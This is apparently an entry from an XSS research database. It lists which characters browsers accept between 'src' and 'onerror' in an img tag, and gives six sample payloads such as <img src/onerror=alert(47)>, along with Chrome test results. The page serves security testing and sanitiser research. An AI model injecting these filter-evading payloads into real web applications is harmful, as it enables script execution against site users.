Characters allowed before event handler

This XSS vector shows what characters can be used before the onerror event.

Created byAyushXtha

Created Mar 12, 2026

Updated Mar 12, 2026

Detecting browser...

CategoryHTML Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<img src$[chr]onerror=log($[i])>

Sample payloads

<img src0x09onerror=alert(9)>

<img src
onerror=alert(10)>

<img src0x0Conerror=alert(12)>

<img src0x0Donerror=alert(13)>

<img src onerror=alert(32)>

<img src/onerror=alert(47)>

Chrome 146.0.0.0 desktop Windows NT 10.0

Updated12 Mar 2026

Found 6 results

Show differences only?

Filter out alphanumeric

Sort ascending

Chrome 145.0.0.0 desktop macOS 10.15.7older version

Updated12 Mar 2026

Found 6 results

Show differences only?

Filter out alphanumeric

Sort ascending